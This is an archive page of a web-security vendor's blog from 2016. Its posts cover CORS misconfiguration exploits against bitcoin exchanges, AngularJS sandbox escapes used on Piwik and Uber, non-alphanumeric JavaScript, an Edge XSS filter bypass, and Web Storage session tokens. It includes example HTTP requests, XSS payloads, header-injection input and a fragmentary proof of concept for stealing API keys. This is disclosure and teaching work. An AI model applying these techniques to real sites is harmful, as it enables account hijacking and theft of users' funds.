Burp Suite, the leading toolkit for web application security testing

PortSwigger Web Security Blog

Friday, October 14, 2016

Exploiting CORS Misconfigurations for Bitcoins and Bounties

(or CORS Misconfiguration Misconceptions)

This is a greatly condensed version of my AppSec USA talk. If you have time (or struggle to understand anything) I highly recommend checking out the slides and watching the video when it lands on YouTube in a month or so.

Cross-Origin Resource Sharing (CORS) is a mechanism for relaxing the Same Origin Policy to enable communication between websites via browsers. It’s widely understood that certain CORS configurations are dangerous, but some associated subtleties and implications are easily misunderstood. In this post I’ll show how to critically examine CORS configurations from a hacker’s perspective, and steal bitcoins.

CORS for Hackers

Websites enable CORS by sending the following HTTP response header:
Access-Control-Allow-Origin: https://example.com
This permits the listed origin (domain) to make visitors’ web browsers issue cross-domain requests to the server and read the responses - something the Same Origin Policy would normally prevent. By default this request will be issued without cookies or other credentials, so it can’t be used to steal sensitive user-specific information like CSRF tokens. The server can enable credential transmission using the following header:
Access-Control-Allow-Credentials: true
This creates a trust relationship - an XSS vulnerability on example.com is bad news for this site.

Hidden in plain sight

Trusting a single origin is easy. What if you need to trust multiple origins? The specification suggests that you can simply specify a space-separated list of origins, eg:
Access-Control-Allow-Origin: http://foo.com http://bar.net
However, no browsers actually support this.

You might also want to use a wildcard to trust all your subdomains, by specifying something like:
Access-Control-Allow-Origin: *.portswigger.net
But that won't work either. The only wildcard origin is '*'

There's a hidden safety catch in CORS, too. If you try to disable the SOP entirely and expose your site to everyone by using the following terrifying looking header combination:
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Then you’ll get the following error in your browser console:
“Cannot use wildcard in Access-Control-Allow-Origin when credentials flag is true.”
This exception is mentioned in the specification, and also backed up by Mozilla’s documentation:
"when responding to a credentialed request,  server must specify a domain, and cannot use wild carding"
In other words, using a wildcard effectively disables the Allow-Credentials header.

As a result of these limitations, many servers programmatically generate the Access-Control-Allow-Origin header based on the user-supplied Origin value. If you see a HTTP response with any Access-Control-* headers but no origins declared, this is a strong indication that the server will generate the header based on your input. Other servers will only send CORS headers if they receive a request containing the Origin header, making associated vulnerabilities extremely easy to miss.

Credentials and bitcoins

So, plenty of websites derive allowed origins from user input. What could possibly go wrong? I decided to assess a few bug bounty sites and find out. Note that as these sites all have bug bounty programs, every vulnerability I mention has been missed by numerous other bounty hunters.

I quickly replicated Evan Johnson's finding that many applications make no attempt to validate the origin before reflecting it, and identified a vulnerable bitcoin exchange (which sadly prefers to remain unnamed):
GET /api/requestApiKey HTTP/1.1
Host: <redacted>
Origin: https://fiddle.jshell.net
Cookie: sessionid=...

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://fiddle.jshell.net
Access-Control-Allow-Credentials: true

{"[private API key]"}
Making a proof of concept exploit to steal users' private API keys was trivial:
var req = new XMLHttpRequest();
req.onload = reqListener;
req.withCredentials = true;

function reqListener() {
After retrieving a user's API key, I could disable account notifications, enable 2FA to lock them out, and transfer their bitcoins to an arbitrary address. That’s pretty severe for a header misconfiguration. Resisting the urge to take the bitcoins and run, I reported this to their bug bounty program and it was patched within an astounding 20 minutes.

Some websites make classic URL parsing mistakes when attempting to verify whether an origin should be trusted. For example, a site which I'll call advisor.com trusts all origins that ended in advisor.com, including definitelynotadvisor.com. Even worse, a second bitcoin exchange (let's call it btc.net) trusted all Origins that started with https://btc.net, including https://btc.net.evil.net. Unfortunately the site unexpectedly and permanently ceased operations before I could build a working proof of concept. I won't speculate as to why.

The null origin

If you were paying close attention earlier, you might have wondered what the 'null' origin is for. The specification mentions it being triggered by redirects, and a few stackoverflow posts show that local HTML files also get it. Perhaps due to the association with local files, I found that quite a few websites whitelist it, including Google's PDF reader:
GET /reader?url=zxcvbn.pdf
Host: docs.google.com
Origin: null

HTTP/1.1 200 OK
Acess-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
and a certain third bitcoin exchange. This is great for attackers, because any website can easily obtain the null origin using a sandboxed iframe:
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>*cors stuff here*</script>’></iframe>

Using a sequence of CORS requests, it was possible to steal encrypted backups of users' wallets, enabling an extremely fast offline brute-force attack against their wallet password. If anyone's password wasn't quite up to scratch, I'd get their bitcoins.

This particular misconfiguration is surprisingly common - if you look for it, you'll find it. The choice of the keyword 'null' is itself a tad unfortunate, because failing to configure an origin whitelist in certain applications may result in...
Access-Control-Allow-Origin: null

Breaking HTTPS

During this research I found two other prevalent whitelist implementation flaws, which often occur at the same time. The first is blindly whitelisting all subdomains - even non-existent ones. Many companies have subdomains pointing to applications hosted by third parties with awful security practises. Trusting that these don't have a single XSS vulnerability and never will in future is a really bad idea.

The second common error is failing to restrict the origin protocol. If a website is accessed over HTTPS but will happily accept CORS interactions from http://wherever, someone performing an active man-in-the-middle (MITM) attack can pretty much bypass its use of HTTPS entirely. Strict Transport Security and secure cookies will do little to prevent this attack. Check out the presentation recording when it lands for a demo of this attack.

Abusing CORS Without Credentials

We've seen that with credentials enabled, CORS can be highly dangerous. Without credentials, many attacks become irrelevant; it means you can't ride on a user's cookies, so there is often nothing to be gained by making their browser issue the request rather than issuing it yourself. Even token fixation attacks are infeasible, because any new cookies set are ignored by the browser.

One notable exception is when the victim's network location functions as a kind of authentication. You can use a victim’s browser as a proxy to bypass IP-based authentication and access intranet applications. In terms of impact this is similar to DNS rebinding, but much less fiddly to exploit.

Vary: Origin 

If you take a look at the 'Implementation Considerations' section in the CORS specification, you'll notice that it instructs developers specify the 'Vary: Origin' HTTP header whenever Access-Control-Allow-Origin headers are dynamically generated.

That might sound pretty simple, but immense numbers of people forget, including the W3C itself, leading to this fantastic quote:
"I must say, it doesn't make me very confident that soon more sites will be supporting CORS if not even the W3C manages to configure its server right" - Reto Gmür
What happens if we ignore this advice? Mostly things just break. However, in the right circumstances it can enable some quite serious attacks.

Client-Side Cache Poisoning

You may have occasionally encountered a page with reflected XSS in a custom HTTP header. Say a web page reflects the contents of a custom header without encoding:
GET / HTTP/1.1
Host: example.com
X-User-id: <svg/onload=alert(1)>

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-User-id
Content-Type: text/html
Invalid user: <svg/onload=alert(1)>
Without CORS, this is impossible to exploit as there’s no way to make someone’s browser send the X-User-id header cross-domain. With CORS, we can make them send this request. By itself, that's useless since the response containing our injected JavaScript won't be rendered. However, if Vary: Origin hasn't been specified the response may be stored in the browser's cache and displayed directly when the browser navigates to the associated URL. I've made a fiddle to attempt this attack on a URL of your choice. Since this attack uses client-side caching, it's actually quite reliable.

Server-Side Cache Poisoning

If the stars are aligned we may be able to use server-side cache poisoning via HTTP header injection to create a stored XSS vulnerability.

If an application reflects the Origin header without even checking it for illegal characters like \r, we effectively have a HTTP header injection vulnerability against IE/Edge users as Internet Explorer and Edge view \r (0x0d) as a valid HTTP header terminator:
GET / HTTP/1.1
Origin: z[0x0d]Content-Type: text/html; charset=UTF-7
Internet Explorer sees the response as:
HTTP/1.1 200 OK
Access-Control-Allow-Origin: z
Content-Type: text/html; charset=UTF-7
This isn't directly exploitable because there's no way for an attacker to make someone's web browser send such a malformed header, but I can manually craft this request in Burp Suite and a server-side cache may save the response and serve it to other people. The payload I've used will change the page's character set to UTF-7, which is notoriously useful for creating XSS vulnerabilities.

Good Intentions and Bad Results

I was initially surprised by the number of sites that dynamically generate Access-Control-Allow-Origin headers. The root cause of this behavior may be two key limitations of CORS - multiple origins in a single header aren't supported, and neither are wildcarded subdomains. This leaves many developers with no choice but to do dynamic header generation, risking all the implementation flaws discussed above. I think that if the specification authors and browsers decided to allow origin lists and partial wildcards, dynamic header generation and associated vulnerabilities would plummet.

Another potential improvement for browsers is to apply the wildcard+credentials exception to the null origin. At present, the null origin is significantly more dangerous than the wildcard origin, something I imagine a lot of people find surprising.

Something else browsers could try is blocking what I've coined "reverse mixed-content" - HTTP sites using CORS to steal data from HTTPS sites. I have no idea what scale of breakage this would cause, though.

Simplicity and security may go hand in hand but by neglecting to support multiple origin declarations, web browsers have just pushed the complexity onto developers with harmful results. I think the main take-away from this is that secure specification design and implementation is fiendishly difficult.


CORS is a powerful technology best used with care, and severe exploits don't always require specialist skills and convoluted exploit chains - often a basic understanding of a specification and a little attentiveness is all you need. In case you're running low on coffee, as of today Burp Suite's scanner will identify and report all the flaws discussed here.

- @albinowax

Tuesday, July 26, 2016

Introducing Burp Infiltrator

The latest release of Burp Suite introduces a new tool, called Burp Infiltrator.

Burp Infiltrator is a tool for instrumenting target web applications in order to facilitate testing using Burp Scanner. Burp Infiltrator modifies the target application so that Burp can detect cases where its input is passed to potentially unsafe APIs on the server side. In industry jargon, this capability is known as IAST (interactive application security testing).

Burp Infiltrator currently supports applications written in Java or other JVM-based languages such as Groovy. Java versions from 4 and upwards are supported. In future, Burp Infiltrator will support other platforms such as .NET.

How Burp Infiltrator works

  1. The Burp user exports the Burp Infiltrator installer from Burp, via the "Burp" menu.
  2. The application developer or administrator installs Burp Infiltrator by running it on the machine containing the application bytecode.
  3. Burp Infiltrator patches the application bytecode to inject instrumentation hooks at locations where potentially unsafe APIs are called.
  4. The application is launched in the normal way, running the patched bytecode.
  5. The Burp user performs a scan of the application in the normal way.
  6. When the application calls a potentially unsafe API, the instrumentation hook inspects the relevant parameters to the API. Any Burp payloads containing Burp Collaborator domains are fingerprinted based on their unique structure.
  7. The instrumentation hook mutates the detected Burp Collaborator domain to incorporate an identifier of the API that was called.
  8. The instrumentation hook performs a DNS lookup of the mutated Burp Collaborator domain.
  9. Optionally, based on configuration options, the instrumentation hook makes an HTTP/S request to the mutated Burp Collaborator domain, including the full value of the relevant parameter and the application call stack.
  10. Burp polls the Collaborator server in the normal way to retrieve details of any Collaborator interactions that have occurred as a result of its scan payloads. Details of any interactions that have been performed by the Burp Infiltrator instrumentation are returned to Burp.
  11. Burp reports to the user that the relevant item of input is being passed by the application to a potentially unsafe API, and generates an informational scan issue of the relevant vulnerability type. If other evidence was found for the same issue (based on in-band behavior or other Collaborator interactions) then this evidence is aggregated into a single issue.

Issues reported by Burp Infiltrator

Burp Infiltrator allows Burp Scanner to report usage of potentially dangerous server-side APIs that may constitute a security vulnerability. It also allows Burp to correlate the external entry point for a vulnerability (for example a particular URL and parameter) with the back-end code where the vulnerability occurs.

In the following example, Burp Scanner has identified an XML injection vulnerability based on Burp's existing scanning techniques, and also reports the unsafe API call that leads to the vulnerability within the server-side application:

Burp Infiltrator enables Burp to report:
  • The potentially unsafe API that was called.
  • The full value of the relevant parameter to that API.
  • The application call stack when the API was invoked.
This information can be hugely beneficial for numerous purposes:
  • It provides additional evidence to corroborate a putative vulnerability reported using conventional dynamic scanning techniques.
  • It allows developers to see exactly where in their code a vulnerability occurs, including the names of code files and line numbers.
  • It allows security testers to see exactly what data is passed to a potentially unsafe API as a result of submitted input, facilitating manual exploitation of many vulnerabilities, such as SQL injection into complex nested queries.

Important considerations

Please take careful note of the following points before using Burp Infiltrator:
  • You should read all of the documentation about Burp Infiltrator before using it or inducing anyone else to use it. You should only use Burp Infiltrator in full understanding of its nature and the risks inherent in its utilization.
  • You can use a private Burp Collaborator server with Burp Infiltrator, provided the Collaborator server is configured using a domain name, not via an IP address.
  • You can install Burp Infiltrator within a target application non-interactively, for use in CI pipelines and other automated use cases.
  • During installation of Burp Infiltrator, you can configure whether full parameter values and call stacks should be reported, and various other configuration options.
For more details, including step-by-step instructions, please refer to the Burp Infiltrator documentation.

Friday, July 15, 2016

Executing non-alphanumeric JavaScript without parenthesis

I decided to look into non-alphanumeric JavaScript again and see if it was possible to execute it without parenthesis. A few years ago I did a presentation on non-alpha code if you want some more information on how it works take a look at the slides. Using similar techniques we were able to hack Uber.

A few things have changed in the browser world since the last time I looked into it, the interesting features are template literals and the find function on the array object. Template literals are useful because you can call functions without parenthesis and the find function can be generated using "undefined" and therefore is much shorter than the original method of "filter".

The basis of non-alpha involves using JavaScript objects to generate strings that eventually lead to code execution. For example +[] creates zero in JavaScript, [][[]] creates undefined. By converting objects such as undefined to a string like this [[][[]]+[]][+[]] then we can reuse those characters and get access to other objects. We need to call the constructor property of a function if we want to call arbitrary code, like this [].find.constructor('alert(1)')().

So the first task is to generate the string "find", we need to generate numbers in order to get the right index on the string undefined. Here's how to generate the number 1.

Basically the code creates zero ! flips it true because 0 is falsey in JavaScript, then + is the infix operator which makes true into 1. Then we need to create the string undefined as mentioned above and get 4th index by add those numbers together. To produce "f".


Then we need to do the same thing to generate the other letters increasing/decreasing the index.


Now we need to combine the characters and access the "find" function on an array literal.

[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]//find function

This gives us some more characters to play with, the find function's toString value is function find() {[native code]}, the important character here is "c". We can use the code above to get the find function and convert it to a string then get the relevant index.


Now we continue and get the other characters of "constructor" using "object", true and false and converting them to strings.


It's now possible to access the Function constructor by getting the constructor property twice on an array literal. Combine the characters above to form "constructor", then use an array literal []['constructor']['constructor'] to access the Function constructor.


Now we need to generate the code we want to execute in this case alert(1), true and false can generate alert. then we need the parenthesis from the [].find function.


That's the code generated now we need to execute it. Template literals will call a function even if it's an expression this allows you to place them next to each other and is very useful for non-alpha code. The Function constructor returns a function and actually needs to be called twice in order to execute the code. E.g Function`alert(1)``` this is perfectly valid JavaScript. You might think you can just pass a generated string inside a template literal and execute the Function constructor however this won't quite work as demonstrated by the following code alert`${'ale'+'rt(1)'}`. The template literals pass each part of the string as an argument, if you place some text before and after the template literal expression then you'll see two arguments are sent to the calling function, the first argument contains the text before and after the template expression separated by a comma and the second argument contains the result of the template literal expression. Like the following code demonstrates:

function x(){ alert(arguments[0]);alert(arguments[1])  }

All that's left to do is pass our generated Function constructor to a template literal and instead of using "x" as above we use "$" at either side of the template literal expression. This creates two unused arguments for the function. The final code is below.


Enjoy - @garethheyes

Tuesday, May 31, 2016

Web Storage: the lesser evil for session tokens

I was recently asked whether it was safe to store session tokens using Web Storage (sessionStorage/localStorage) instead of cookies. Upon googling this I found the top results nearly all assert that web storage is highly insecure relative to cookies, and therefore not suitable for session tokens. For the sake of transparency, I've decided to publicly document the rationale that lead me to the opposite conclusion.

The core argument used against Web Storage says because Web Storage doesn't support cookie-specific features like the Secure flag and the HttpOnly flag, it's easier for attackers to steal it. The path attribute is also cited. I'll take a look at each of these features and try to examine the history of why they were implemented, what purpose they serve and whether they really make cookies the best choice for session tokens.

The Secure Flag

The secure flag is quite important for cookies, and outright irrelevant for web storage. Web Storage adheres to the Same Origin Policy, which isolates data based on an origin consisting of a protocol and a domain name. Cookies need the secure flag because they don't properly adhere to the Same Origin Policy - cookies set on https://example.com will be transmitted to and accessible via http://example.com by default. Conversely, a value stored in localStorage on https://example.com will be completely inaccessible to http://example.com because the protocols are different.

In other words, cookies are insecure by default, and the secure flag is simply a bodge to make them as resilient to MITM attacks as Web Storage. Web Storage used over HTTPS effectively has the secure flag by default. Further information on related nuances in the Same Origin Policy can be found in The Tangled Web by Michal Zalewski.

The Path Attribute

The path attribute is widely known to be pretty much useless for security. It's another example of where cookies are out of sync with the Same Origin Policy - paths are not considered part of an origin so there's no security boundary between them. The only way to isolate two applications from each other at the application layer is to place them on separate origins.

The HttpOnly Flag

The HttpOnly flag is an almost useless XSS mitigation. It was invented back in 2002 to prevent XSS being used to steal session tokens. At the time, stealing cookies may have been the most popular attack vector - it was four years later that CSRF was described as the sleeping giant.

Today, I think any competent attacker will exploit XSS using a custom CSRF payload or drop a BeEF hook. Session token stealing attacks introduce a time-delay and environment shift that makes them impractical and error prone in comparison - see Why HttpOnly Won't Protect You for more background on why. This means that if an attacker is proficient, HttpOnly won't even slow them down. It's like a WAF that's so ineffective attackers don't even notice it exists.

The only instance I've seen where HttpOnly was a significant security boundary is on bugzilla.mozilla.org. Untrusted HTML attachments are served from a subdomain which has access to the parent domain's session cookies thanks to cookies' not-quite-same-origin-policy. Ultimately as with the secure flag, the HttpOnly flag is only really required to make cookies as secure as web storage.

Differences that Matter

One major difference between the two options is that unlike cookies, web browsers don't automatically attach the contents of web storage to HTTP requests - you need to write JavaScript to attach the session token to a HTTP header. This actually conveys a huge security benefit, because it means the session tokens don't act as an ambient authority. This makes entire classes of exploits irrelevant. Browsers' behaviour of automatically attaching cookies to cross-domain requests is what enables attacks like CSRF and cross-origin timing attacks. There's a specification for yet another another cookie attribute to fix this very problem in development at the moment but for now to get this property, your best bet is Web Storage.

Meanwhile, the unhealthy state of the cookie protocol leads to crazy situations where the cookie header can contain a blend of trusted and untrusted data. This is something the ill-conceived double-submit CSRF defence fell foul of. The solution for this is yet another cookie attribute: Origin.

Unlike cookies, web storage doesn't support automatic expiry. The security impact of this is minimal as expiry of session tokens should be done server-side, but it is something to watch out for. Another distinction is that sessionStorage will expire when you close the tab rather than when you close the browser, which may be awesome or inconvenient depending on your use case. Also, Safari disables Web Storage in private browsing mode, which isn't very helpful.

This post is intended to argue that Web Storage is often a viable and secure alternative to cookies. Web Storage isn't ideal for session token storage in every situation - retrofitting it to a non single-page application may add a significant request overhead, Safari disables Web Storage in private browsing mode, and it's insecure in Internet Explorer 8. Likewise, if you do use cookies please use both Secure and HttpOnly.


At first glance it looks like cookies have more security features, but they're ultimately patches over a poor core design. For an in depth assessment of cookies, check out HTTP cookies, or how not to design protocols. Web Storage offers an alternative that, if not secure by default, is less insecure by default.

 - @albinowax

Friday, May 20, 2016

Using disk-based projects with OpenJDK

Since the introduction of Burp projects in Burp Suite 1.7 we've had some reports of native crashes in the OpenJDK JVM when using disk-based projects.

Disk-based projects use memory-mapped files, which have been a core part of the Java API spec for a very long time. Because memory-mapped files need to be implemented in native code, there is inherently more potential for compatibility issues, both with the core OS and with disk drivers.

It appears that a bug in OpenJDK may cause the JVM process to crash when using memory-mapped files. This appears to affect only certain platforms, notably Kali Linux.

The easiest way to resolve this issue is to use Oracle Java, which does not contain the bug.

We appreciate that in some instances using Oracle Java may not be practical. We have received reports that this bug has been patched in JDK 9, and it may be possible to backport this patch to Java 7 or 8.

Monday, April 25, 2016

Adapting AngularJS Payloads to Exploit Real World Applications

Every experienced pentester knows there is a lot more to XSS than <script>alert(1)</script> - filtering, encoding, browser-quirks and WAFs all team up to keep things interesting. AngularJS Template Injection is no different. In this post, we will examine how we adapted template injection payloads to bypass filtering and encoding and exploit Piwik and Uber.

Lower case conversion

Piwik, an open-source analytics platform with a healthy 2.7 million downloads, uses AngularJS 1.2.26, and displays search queries from visitors.

By spoofing a referral from Google, we can inject a keyword containing an Angular expression in here. However, injecting the appropriate sandbox escape for Angular 1.2.26 doesn't work:


Piwik converts this input to lower case, preventing the charAt function from being overwritten and valueOf from being called. We easily got round those restrictions by using unicode escapes to overwrite the charAt function:


and used ''.concat instead of valueOf:


Here is the final payload (Broken slightly to discourage exploits):



This vulnerability is really quite serious - an unauthenticated attacker can inject a payload which will hijack the account of anyone who views it. If an admin account is hijacked, we may be able to install a malicious module and take complete control of the webserver. Update to Piwik 2.16.1 to get the fix.

No quotes allowed

The ride-sharing company Uber lets developers submit and manage apps via developer.uber.com. They use a third party (readme.io) to display associated documentation at https://developer.uber.com/docs/.

This site uses AngularJS and reflects the current URL using server-side templating, but crucially doesn't URL decode it first. Firefox and Chrome both URL-encode quotes and apostrophes, meaning that if we want a cross-browser payload (and a decent vulnerability bounty), we need an alternative way of getting the string object. Also, we can't use any spaces, regardless of the browser.

Using the toString method of an object, we can create a string without the need for single or double quotes. ({}.toString) creates the string, then we can use its constructor to access the String object and call fromCharCode.


Mario Heiderich came up with a shorter version that removes the object literal reference. This can also be reduced (for those of you who like code "golfing") to:-


No quotes or constructor

However, there was one more catch. Uber was using Angular 1.2.0 which bans accessing constructor via a regular javascript property like obj.constructor, although an object accessor like obj['constructor'] was allowed. So I needed to generate the string "constructor" but I couldn't access the String constructor to call fromCharCode because I need to pass the string "constructor". A chicken and egg situation.

I thought how I could generate a string and concatenate them together without using +. I decided to use arrays. First off I create a blank array.
The next problem was how to generate the required characters for constructor without the ability to call fromCharCode (because we can't use constructor yet) and no quotes! The trick here is to use existing objects to generate the required characters. You could almost think of this as a twisted kind of ROP. Using the toString method of the currently scoped object will generate the string [object Object] giving us some of the characters required for constructor.

o=toString();//[object Object]

The observant among you might be wondering how we could get a "n" since Angular tolerates undefined objects so we can't convert an undefined object into a string. The solution is to use the anchor "function" on the string as the generated output contains an "n".

t=o.anchor(true);//<a name="true">[object Undefined]</a>

Next I need to generate false too using the same method. You could use false.toString() instead of course. And now add all the strings into the array.

I then need to join these characters together but I can't generate a blank string using quotes. The solution is to use an array literal which does the same thing.


So we have our string "constructor" the next stage is to use the required exploit for 1.2.0 by Jan Horn and pass our string to it. We can now generate characters using fromCharCode now that we can use "constructor". Here is the final exploit in all its glory.


Uber/readme.io somewhat impressively patched this issue within 24 hours of it being reported.

Even when you're inside a JavaScript sandbox, there is still plenty of room for adapting exploits to bypass environmental constraints. These techniques should serve as a foundation for tackling whatever you encounter.

Happy sandbox hacking - @garethheyes & @albinowax

Friday, April 15, 2016

Edge XSS filter bypass

I originally reported this issue to Microsoft on 4th September 2015 but it remains unfixed. As it has been so long since my original report I have decided to blog about the details now.

IE had a flaw in the past where you could use the location object as a function and combine toString/valueOf in a object literal to execute code. I think it was first discovered by Sirdarckcat but I may be wrong. Basically you use the object literal as a fake array which calls the join function that constructs a string from the object literal and passes it to valueOf which in turn passes it to the location object. Here is the code:


This also works on the latest version of Edge too however both browsers will detect it as a XSS attack. The XSS filter regexes detect a string followed by any number of characters, followed by either a "{" or "," then toString/valueOf and colon character. The "a" from valueOf and the "o" from toString are replaced by the "#" character. Here is a simplified version of the regex:


Here are the Regexes as of October 2015.

Edge though supports ES6 and there are some useful new features. Computed properties in ES6 allow you to pass an expression to calculate the property name. For example:


I think you can see where this is going. By combining the two techniques we can bypass the Edge XSS filter. As shown earlier the regexes look for toString/valueOf unfortunately we can obfuscate them using computed properties.



Happy filter hacking - @garethheyes

Support Center

Get help and join the community discussions at the Burp Suite Support Center.

Visit the Support Center ›

Copyright 2016 PortSwigger Ltd. All rights reserved.